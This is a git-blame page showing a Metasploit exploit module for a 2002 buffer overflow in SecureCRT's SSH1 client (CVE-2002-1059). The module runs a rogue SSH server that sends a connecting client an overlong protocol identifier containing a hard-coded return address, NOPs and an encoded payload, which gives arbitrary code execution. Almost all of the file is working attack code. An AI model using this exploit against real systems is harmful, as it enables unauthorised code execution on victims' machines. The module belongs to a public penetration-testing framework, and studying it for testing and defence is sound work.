Files
metasploit-gs/modules/exploits/windows/ssh/securecrt_ssh1.rb
T

Ignoring revisions in .git-blame-ignore-revs. Click here to bypass and see the normal blame view.

70 lines
1.9 KiB
Ruby
Raw Normal View History

##
2017-07-24 06:26:21 -07:00
# This module requires Metasploit: https://metasploit.com/download
2013-10-15 13:50:46 -05:00
# Current source: https://github.com/rapid7/metasploit-framework
##
2016-03-08 14:02:44 +01:00
class MetasploitModule < Msf::Exploit::Remote
2009-12-06 05:50:37 +00:00
Rank = AverageRanking
2006-12-14 13:50:59 +00:00
include Msf::Exploit::Remote::TcpServer
2006-12-14 13:50:59 +00:00
def initialize(info = {})
super(update_info(info,
2014-03-11 12:44:34 -05:00
'Name' => 'SecureCRT SSH1 Buffer Overflow',
2006-12-14 13:50:59 +00:00
'Description' => %q{
This module exploits a buffer overflow in SecureCRT <= 4.0
2006-12-14 13:50:59 +00:00
Beta 2. By sending a vulnerable client an overly long
SSH1 protocol identifier string, it is possible to execute
arbitrary code.
This module has only been tested on SecureCRT 3.4.4.
},
'Author' => 'MC',
'License' => MSF_LICENSE,
'References' =>
[
2006-12-14 13:50:59 +00:00
[ 'CVE', '2002-1059' ],
[ 'OSVDB', '4991' ],
[ 'BID', '5287' ],
2006-12-14 13:50:59 +00:00
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 400,
'BadChars' => "\x00",
'MaxNops' => 0,
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'SecureCRT.exe (3.4.4)', { 'Ret' => 0x0041b3e0 } ],
],
'Privileged' => false,
2020-10-02 17:38:06 +01:00
'DisclosureDate' => '2002-07-23',
2006-12-14 13:50:59 +00:00
'DefaultTarget' => 0))
register_options(
[
2006-12-14 13:50:59 +00:00
OptPort.new('SRVPORT', [ true, "The SSH daemon port to listen on", 22 ])
])
2006-12-14 13:50:59 +00:00
end
def on_client_connect(client)
return if ((p = regenerate_payload(client)) == nil)
2006-12-14 13:50:59 +00:00
buffer = "SSH-1.1-OpenSSH_3.6.1p2\r\n" + rand_text_english(243)
2006-12-14 13:50:59 +00:00
buffer << [target.ret].pack('V') + make_nops(20) + payload.encoded
print_status("Sending #{buffer.length} bytes to #{client.getpeername}:#{client.peerport}...")
client.put(buffer)
handler
service.close_client(client)
end
end